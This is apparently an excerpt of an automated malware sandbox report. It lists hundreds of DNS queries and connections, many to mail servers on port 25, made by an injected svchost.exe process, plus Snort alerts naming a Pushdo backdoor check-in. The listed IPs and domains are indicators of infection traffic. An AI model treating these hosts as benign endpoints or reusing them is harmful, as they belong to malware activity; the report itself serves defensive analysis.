                Source: C:\Windows\SysWOW64\svchost.exeDomain query: barracuda.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.237.66.112 443Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 89.107.169.125 80
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: samtv.ro
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mxa-001d4f01.gslb.pphosted.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ftchat.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: thehealthline.ca
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: riminireservation.it
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: marcovasco.fr
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: yasuma.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: visimax.com.au
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: 4locals.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: lanskroun.cz
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: socket.net
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 74.125.137.27 25
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mail51.gullestrupnet.dk
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 153.122.170.15 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: johnlyon.org
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: vektor.net
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.76.140 80
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: uniparthenope.it
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: resumesrv.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: reaganfoundation.org.1.0001.arsmtp.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ns1.iptwins.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: hearst.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: metro-trust.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: fedteldirect.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: buildness.pt
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mail.tspl-india.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mx02.xnote.us
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mx0a-00170501.pphosted.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: dns12.ovh.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: moldmasters.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: fletchers.uk.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: vmbuildingsolutions.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: irvingisd.net
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.160.0.179 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: icci.us.1.arsmtp.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: cdw.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: nlcv.bas.bg
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: com-edit.fr
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 135.125.108.170 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: adlerlacke-com01c.mail.protection.outlook.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 165.160.15.20 80
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: suddenlink.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 81.0.97.108 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: fhbg.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: absblast.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: riwn.org
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: geecl.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 94.130.146.206 443Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: juso-gr.ch
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: hotmial.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mx1.pythian.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: sutcast.ca
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ns.w2hdns2.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: bettzedek-org.inbound.emailservice.co
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: bvision.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ns1.pontualti.com.br
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: spray.se
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: livejournali.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 23.227.38.32 80
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: zzconsult.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: people.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: rjii.net.1.0001.arsmtp.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: optimagroupinc.com.2.0001.arsmtp.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 51.89.6.56 80
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.160.168 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ns01.memail-dns.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: inosat.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 183.181.82.14 80
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: t-trust.jp
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: whitemc.it
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.72.150 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: sequere.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ns-1680.awsdns-18.co.uk
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: event.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mx.voiaj.md
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: forbin.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: gocsc.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: juliemusic.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 157.7.231.224 25
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: dergavoldop.info
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: smtp.live.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mailstream-west.mxrecord.io
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mail.dbins.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: onelinkpr.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mailex.2980.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: tovarish.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.169.15.168 80
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: selectivemetals.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 151.101.2.132 80
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: idealtile.com.2.0001.arsmtp.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: cartadelapau.org
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: veeam.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: pfizer.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: linder.fr
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 67.21.93.229 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 203.137.75.45 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mariareinamarianistas.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: zippymail.info
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mx-in01.eu.retarus.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mx4.svitonline.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: cluster-h.mailcontrol.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.160.0.131 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: medianis.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: nomatech.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: cpacanada.ca
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: peoplescom.net
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 83.223.113.46 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ns1.telekom.net
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 69.195.90.46 80
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: conceriacaponigiuseppe.it
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: deepakfasteners.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: dfoofmail.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mail.yaxmail.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: bisok.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 85.128.196.22 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mxa-003d6e01.gslb.pphosted.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: s5w.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: paraski.org
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: logicsupport.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: gftg.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: nbhn.org
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 74.208.215.145 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: any-s.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: svitonline.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: piacton.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 145.239.5.159 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: harrahs.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mail.sequere.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 34.174.61.199 25Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 77.78.104.3 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: molodin.org
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: sabca.be
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ardaco.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: srv4.rejecthost.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: gtdel.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: globcom.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: tvcskyshop.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: asorent.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: bienydebuenas.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: pythian.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ymlp15.net
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 212.44.102.75 25
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mbn.nifty.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: hlag.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: krim.ws
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: plantasmediterraneas.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: biosolve.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 76.223.54.146 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 203.0.113.0 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: denbiggelaar.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: whistlerlibrary.ca
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 208.100.26.245 25Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: nekono.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: cvswl.org
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: weber-metaux.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: allstate.ca
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mx.breakthur.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: sninternet.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: cubodown.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: infotech.pl
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: c1oramn.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 61.200.81.21 25Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.164.178 443Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.muhr-soehne.de
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: fortknox.bm
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: my.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: camamat.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: alexpope.biz
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: fundeo.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: pec.vittoriaassicurazioni.it
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: sunshineblp.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: wallstreetinstitute.cz
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 103.168.172.218 25
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mclink.it
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: lieblingslied-records.de
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mx1.active24.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: sanfotek.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mouseclicker.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: 4uservizi.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: visu.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: fr-dat.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: vitor.tk
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 195.128.140.29 80
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 159.89.244.183 25
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 38.111.255.201 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: oozkranj.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 99.83.190.102 80
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: prtc.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: thehealthline-ca.mail.protection.outlook.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: nsa.pegasodns.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mail.telecompost.it
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: w01a08c1.kasserver.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 47.91.167.60 80
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: linochaves.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: eilhk.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: tanya.net
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 219.94.128.87 80
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.234.121 80
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.234.120 25Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.8.75 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 93.187.206.66 25
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 82.208.6.9 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ns1.locaweb.com.br
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mail.resumesrv.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: crosstech.com.au
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ns2.myvdc.it
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: pettigna.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: 6clo.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.214.171.193 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: compzon.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: emael.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: 24.com.es
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: pylypiuk.qmal.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: foodallergy.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: lbindustries.org
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mx01.t-com.hr
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 34.224.10.110 80
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ns1.terrakom.hr
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: cci-dialog.de
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: awal.ws
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mxa-00160c04.gslb.pphosted.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: c-drop.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: modeinfo.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ns1.hostpro.ua
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: emial.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: sochi.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: binarysecuritysolutions.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mailgw6.gtinvest.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: markerman.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: leva.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: cho.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: evertek.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ns1.yandex.ru
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ftcispnet-mx.email-protect.gosecure.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: sjm.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: hertspartsft.nhs.uk
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: snf.it
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: miles.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: soluzioni-sw.it
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.209.11 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: rkengg.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: madjek.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 34.94.245.237 25
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: turner.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: gyn.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: revoldia.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: meta-lab.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: certifiedtileandmarble.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: segnidivik.it
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: s-sm.org
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: centrum-cz-10mx1.eco-mx.cz
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.212.145.129 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 86.105.245.69 80
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: rcm.at
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: net-up.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: moakt.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mail.trinom.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: tivejo.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: alltell.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: culver.com.au
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mail.protonmail.ch
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mailgw02.host.it
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: pelicanhill.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.22.232.175 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: plenimagem.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ellusions.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: web.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 59.106.13.169 25
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: e-asset.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mxa-00181c02.gslb.pphosted.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: smtp.vektor.net
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 193.70.68.254 80
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ocel.cz
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ns-ut7.proofpoint.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: nettlinx.org
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: us.es
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mx01.nicmail.ru
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: expotaranto.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: softizer.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: srsparivar.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: rokoron.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: k-nikko.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.jroy.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ns37.domaincontrol.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mail.eilhk.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: doggybag.org
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mx3.ovh.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: harlandale.net
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 148.72.176.26 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: dwid.de
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 59.106.13.181 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: hsmx149.cn4e.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 93.188.2.51 25Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mx100.nn.hr
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 164.92.82.47 80
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: feital.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: fsrinc.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: nomatech-net.mail.protection.outlook.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: bc.dmgarch.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: uk.mx1.mailanyone.net
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.66.220 443Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: terradoliva.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ns1.epbinternet.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mail.lb.auchan.pt
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: easybuygos.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ns-769.awsdns-32.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mspool.cdt.cz
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: alt4.gmail-smtp-in.l.google.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: leapc.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: pacificcoast.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: hotmmai.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: spetema.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: nsbuechner.de
                Source: TrafficSnort IDS: 2016867 ET TROJAN Backdoor.Win32.Pushdo.s Checkin 192.168.2.3:49712 -> 104.21.46.148:80
                Source: TrafficSnort IDS: 2037771 ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst 34.174.61.199:80 -> 192.168.2.3:50205
                Source: unknownDNS query: name: ns10.dnsmadeeasy.com
                Source: unknownDNS query: name: ns9.zoneedit.com
                Source: unknownDNS traffic detected: query: lbindustries.org replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: 1thecity.biz replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: atis-sk.ca replaycode: Server failure (2)
                Source: unknownDNS traffic detected: query: coldmail.ca replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: dyag-eng.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: sedmasekunda.hr replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: amba-tc.si replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mondopp.net replaycode: Server failure (2)
                Source: unknownDNS traffic detected: query: nyrmusic.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pettigna.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: iranytu.net replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: taxperts.on.ca replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: www.owsports.ca replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: kayoaiba.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: arowines.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: deepakfasteners.com replaycode: Server failure (2)
                Source: unknownDNS traffic detected: query: avc.com.sa replaycode: Server failure (2)
                Source: unknownDNS traffic detected: query: anteph.org replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: www.koz1.net replaycode: Server failure (2)
                Source: unknownDNS traffic detected: query: agitz.com.br replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: dergavoldop.info replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: polprime.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: iaxs.net.mx1.visi.rcimx.net replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: www.yumgiskor.kz replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: pcoyuncu.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: cpcgunion.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: ktenergo.ru replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: toundo.net replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: cpwpb.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: someikan.com replaycode: Server failure (2)
                Source: unknownDNS traffic detected: query: clysma.com replaycode: Server failure (2)
                Source: unknownDNS traffic detected: query: grlawcc.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: haigh-me.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: yhsll.com replaycode: Server failure (2)
                Source: unknownDNS traffic detected: query: fermo.cz replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: paraski.org replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: invictus.pl replaycode: Server failure (2)
                Source: unknownDNS traffic detected: query: webband.com replaycode: Server failure (2)
                Source: unknownDNS traffic detected: query: placemail.online replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: www.udesign.biz replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: cabonet.net replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: mail7.digitalwaves.co.nz replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: canmore.com replaycode: Server failure (2)
                Source: unknownDNS traffic detected: query: 4mail.top replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: www.jroy.net replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: nbhn.org replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: gnail.it replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: eos-i.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: awfraser.com replaycode: Server failure (2)
                Source: unknownDNS traffic detected: query: srbattery.com replaycode: Server failure (2)
                Source: unknownDNS traffic detected: query: 89gospel.com replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: chzko.ru replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: www.medisa.info replaycode: Server failure (2)
                Source: unknownDNS traffic detected: query: actmin.com replaycode: Server failure (2)
                Source: unknownDNS traffic detected: query: outook.com replaycode: Server failure (2)
                Source: unknownDNS traffic detected: query: vitor.tk replaycode: Name error (3)
                Source: unknownDNS traffic detected: query: oranek.com replaycode: Name error (3)
